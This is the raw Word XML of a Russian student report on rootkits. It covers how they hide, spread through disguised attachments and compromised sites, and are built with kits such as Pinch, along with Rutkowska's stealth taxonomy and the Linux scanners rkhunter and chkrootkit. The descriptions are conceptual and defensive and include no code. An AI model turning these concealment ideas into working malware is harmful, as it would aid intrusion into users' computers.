    <w:p w:rsidR="00C957A9" w:rsidRDefault="00C957A9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е быть замеченными антивирусными программами, руткиты манипулируют процессами, с помощью которых приложения проводят обмен данными между собой. Вредоносы удаляют из этих потоков сведения о себе и других подобных программах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C7D6B" w:rsidRPr="006C7D6B" w:rsidRDefault="006C7D6B" w:rsidP="00B6266C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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которые руткиты имеют весьма изощренные трюки. Например, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7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acker Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7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ход брандмауэра открывает тайные лазейки в сеть, что позволяет хакерам управлять зараженным компьютером.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7D6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957A9" w:rsidRDefault="008E60F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ространения подобных программ обычно используется Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E60F6" w:rsidRDefault="008E60F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это может быть почтовое вложение с «мнимым» документом (маскировка под некоторый формат), на деле же исполнимый файл. При открытии такого файла пользователь активирует руткит.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E60F6" w:rsidRDefault="008E60F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же пользователь может зайти на некоторый сайт, подвергшийся хакерской атаке, и уже при простом открытии страниц сайта руткит попадет на ПК (благодаря уязвимостям в системе безопасности браузера).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F57F39" w:rsidRDefault="00F57F39" w:rsidP="00B626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к уже говорилось ранее, «зомби-сети», составленные из тысячей зараженных компьютеров занимаются атаками или рассылкой спама от ничего не подозревающих пользователей. Раньше существовало мнение, что такое под силу лишь программистам-профессионалам. Но в последнее время в сети все чаще встречаются наборы инстр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Toolkits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) для написания рассматриваемых нами скрытых программ. Одним из популярных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Pinch</w:t>
      </w:r>
      <w:r w:rsidR="006D7FCF" w:rsidRPr="00AF785C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF785C" w:rsidRPr="00AF785C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="006D7FCF" w:rsidRPr="00AF785C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF785C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">активно используемая в Рунете троянская программа с открытым кодом, что и привело к доработкам, модификациям и использованию кода </w:t>
      </w:r>
      <w:r w:rsidR="00AF785C" w:rsidRPr="004A3FB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">сторонними разработчиками. Основой </w:t>
      </w:r>
      <w:r w:rsidR="004A3FB2" w:rsidRPr="004A3FB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">этого вредоноса служит </w:t>
      </w:r>
      <w:r w:rsidR="004A3FB2" w:rsidRP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>Pinch Builder Trojan</w:t>
      </w:r>
      <w:r w:rsid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и использовании интерфейса </w:t>
      </w:r>
      <w:r w:rsidR="004A3FB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inch</w:t>
      </w:r>
      <w:r w:rsidR="004A3FB2" w:rsidRP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3FB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 разные новые вредоносные функции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0544" w:rsidRDefault="00AF0544" w:rsidP="00B6266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так называемые наборы для создания троянов можно найти на специальных сайтах. Описанные выше факты говорят о том, что теоретически возможно массовое написание самодельных «вредителей».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5936" w:rsidRDefault="00BE5936" w:rsidP="00B6266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крытия вредоносного программного обеспечения могу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применены</w:t>
      </w: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ые метод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дем в качестве примера классификацию механизмов сокрытия, предложенную </w:t>
      </w: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оанной Рутковской в рабо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BE5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roducing Stealth Malware Taxonom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дополненном виде.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE5936" w:rsidRDefault="00BE5936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6ABFB5" wp14:editId="4F495EEA">
            <wp:extent cx="5940425" cy="3996286"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="1" name="Рисунок 1" descr="Рис. 1. Схема классификации механизмов сокрытия программного обесп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Схема классификации механизмов сокрытия программного обеспеч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36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стенографических механизмов в маскировке внедренных объектов под легитимные, например используется схожесть с именами системных файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD3EC0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доносные файлы остаются фактически видными пользователю, однако подозрения у него не вызывают. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD3EC0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редоносные пакеты используют сертификаты доверенных компаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD3EC0" w:rsidRDefault="00DD3EC0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компоненты червя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> имели цифровую подпись компании</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD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(!).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A2DA9" w:rsidRDefault="000A2DA9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отсутствия технических механизмов сокрытия такое вредоносное программное обеспечение может быть легко обнаружено, что делает стенографические механизмы неприменимыми вне комбинации с техническими.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A2DA9" w:rsidRDefault="000A2DA9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технических механизмов информация о скрываемом объекте становится недоступна средству обнаружения. Такие механизмы могут работать «внутри» и «вне» операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A2DA9" w:rsidRDefault="005625EC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утрисистемных механизмов объектом может являться процесс, драйвер, файл на диске, сетевой порт. Для достижения поставленной цели </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>могут быть изменены пути выполнения, структуры памяти, как в пользовательском, так и в системном адресных пространствах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6EDF" w:rsidRDefault="004B6EDF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пути выполнения осуществляется перехват функций штатного обработчика и управление передается вредоносному обработчику, который в свою очередь изменяет возвращаемый результат. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6EDF" w:rsidRDefault="004B6EDF" w:rsidP="00B6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ткит-механизмы «вне» операционной системы предполагают установку собственного или модификацию существующего обработчика событий в некотором режиме работы процессора или дополнительного аппаратного обеспечения. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B6EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для работы этих механизмов зачастую необходимо наличие набора микросхем с поддержкой требуемой технологии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152364" w:rsidRDefault="00152364" w:rsidP="00B6266C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152364">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Широко известный в узких кругах автор R_T_T в своих работах «Кремневый беспредел» описывает возможности и угрозы информационной безопасности не только от указанных технологий, но и от механизма обновления микрокода процессора (bit.ly/VRQD6O и bit.ly/104EsRB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4D2D" w:rsidRDefault="00DF4D2D" w:rsidP="00B6266C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программно-аппаратные руткиты функционируют «вне ОС». Наиболее интересны экземпляры, построенные на основе технологии аппаратной виртуализации. Во-первых, их можно установить с помощью драйверов — штатного механизма различных ОС. Во-вторых, такие руткиты могут перехватывать события более высокого уровня, чем другие. В-третьих, они лучше документированы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003351AD" w:rsidRPr="00C957A9" w:rsidRDefault="003351AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003351AD" w:rsidRPr="00C957A9" w:rsidRDefault="003351AD" w:rsidP="003351A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351AD" w:rsidRPr="00840ADB" w:rsidRDefault="003351AD" w:rsidP="003351A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51125772"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.3 Обзо</w:t>
      </w:r>
      <w:r w:rsidR="00840ADB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">р ПО для поиска и удаления руткитов в </w:t>
      </w:r>
      <w:r w:rsidR="00840ADB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00840ADB" w:rsidRDefault="00840ADB" w:rsidP="00840ADB"/>
    <w:p w:rsidR="007B24EC" w:rsidRPr="007B24EC" w:rsidRDefault="007B24EC" w:rsidP="007B24EC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7B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для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GNU/Linux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>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>существует ряд</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> инструментов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сканирования руткитов, которые помогают противостоять известным или потенциальным руткитам. </w:t>
      </w:r>
      <w:r w:rsidR="00A76D82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рассмотрим один</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из таких инструментов</w:t>
      </w:r>
      <w:r w:rsidR="00A76D82">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 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Rootkit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Hunter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>или сокращенно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rkhunter</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC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утилита очень проста в использовании, её характерным преимуществом является наличие во всех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GNU</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1CE0" w:rsidRDefault="007B24EC" w:rsidP="007B24EC">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Rkhunter</w:t>
      </w:r>
      <w:r w:rsidR="0024351A">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,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>конечно не устанавливается по умолчанию, но в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hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007B24EC">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>репозиториях</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve">имеется. </w:t>
      </w:r>
      <w:r w:rsidR="00332295">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>khunter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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r w:rsidR="00332295">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет графической оболочки</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, поэтому все </w:t>
      </w:r>
      <w:r w:rsidR="00332295">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>команды выполняются через</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> терминал и обязательно</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"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с правами суперпользователя</w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B24EC">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(sudo - замена root</w:t>
      </w:r>
      <w:r w:rsidR="0024351A">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FE4411">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2289" w:rsidRDefault="009A228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илита сравнивает хэ</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2289">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ши исполняемых системных файлов с известными значениями, содержащимися в базе данных, проверяет на известные руткиты файлы и каталоги, выявляет зловредный код, проводит проверку сетевых портов и интерфейсов, проводит проверку системного</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2289">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, проводит проверку групп и аккаунтов, проводит проверку системных конфигурационных файлов, проводит проверку файловой системы в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F5C6E" w:rsidRDefault="002F5C6E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F5C6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нструмент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ом</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5C6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5C6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сигнатурный метод</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5C6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> после установки конфигураци</w:t>
      </w:r>
      <w:r w:rsidR="0023216D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и необходимо сделать «слепок» операционной системы </w:t>
      </w:r>
      <w:r w:rsidRPr="002F5C6E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(первоначальная база данных свойств различных команд), чтобы было можно сравнивать текущее состояние системы с состоянием команд в этой БД.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6176" w:rsidRDefault="00E32CA3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канирование с помощью данной утилиты можно выполнять в нескольких режимах: поиск уязвимостей в командах, поиск именно руткитов как таковых, проверка сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2289" w:rsidRDefault="007C6625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9A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rkhunter</w:t>
      </w:r>
      <w:r w:rsidR="009A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">не удаляет самостоятельно руткиты. </w:t>
      </w:r>
      <w:r w:rsidR="00F86BFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Результаты проверки записываю</w:t>
      </w:r>
      <w:r w:rsidR="009A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тся в файл</w:t>
      </w:r>
      <w:r w:rsidR="009A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="009A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:rStyle w:val="txb"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/var/log/rkhunter/rkhunter .log</w:t>
      </w:r>
      <w:r w:rsidR="009A2289" w:rsidRPr="009A2289">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B630A" w:rsidRDefault="007B630A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D25F57" w:rsidRPr="00D25F57" w:rsidRDefault="00D25F57" w:rsidP="00D25F57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D25F57">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инструмент chkrootkit (Check Rootkit).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D25F57" w:rsidRDefault="00D25F57" w:rsidP="00D25F57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скрипт при помощи стандартных </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25F57">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инструментов UNIX / Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> strings ,</w:t>
      </w:r>
      <w:r w:rsidR="00DF2844">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>grep ) сравнивает</w:t>
      </w:r>
      <w:r w:rsidRPr="00D25F57">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в файловой системе /proc  файлов с выводом команды ps (состояние процесса)</w:t>
      </w:r>
      <w:r w:rsidR="00DF2844">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и далее ищет </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25F57">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>расхождения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1CE0" w:rsidRDefault="00EC1CE0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содержит </w:t>
      </w:r>
      <w:r w:rsidR="009B51AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>различные модуля</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для сканирования: для поиска интерфейсов, работающих в режиме захвата пакетов, для обнаружения фактов удаления записей из файла журнала, для поиска следов от троянов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LKM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1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EC1CE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>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, а также в остальных директориях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC1CE0" w:rsidRDefault="00EC1CE0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утилита может пользоваться результатами работы следующих утилит: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1CE0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>awk, cut, egrep, find, head, id, ls, netstat, ps, strings, sed, uname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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8C247F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вестные руткиты, которык могут быть найдены с помощью утилиты: </w:t>
      </w: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E367E9" w:rsidRDefault="00E367E9" w:rsidP="009A2289">
      <w:pPr>
        <w:pStyle w:val="aa"/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EB34FE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72AD78C0" wp14:editId="03FE63BA">
            <wp:extent cx="4352925" cy="5105400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2" name="Рисунок 2" descr="Список что может найти chkroot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что может найти chkrootki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3" r="1" b="6130"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43529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Default="00736942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Default="003A0226">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A0226" w:rsidRPr="00C957A9" w:rsidRDefault="003A0226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 w:rsidP="00736942">
      <w:pPr>
        <w:pStyle w:val="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5" w:name="_Toc451125773"/>
      <w:r w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Методы решения</w:t>
      </w:r>
      <w:r w:rsidR="00AE3249" w:rsidRPr="00C957A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (как работает антивирусное ПО)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00AE3249" w:rsidRPr="00C957A9" w:rsidRDefault="00AE3249" w:rsidP="00AE3249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE3249" w:rsidRDefault="00951D23" w:rsidP="00AE3249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Основная часть любых антивирусных программ – сканирующий движок (или сканер), обычно представленный в виде библиотечного файла (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C957A9">
        <w:rPr>
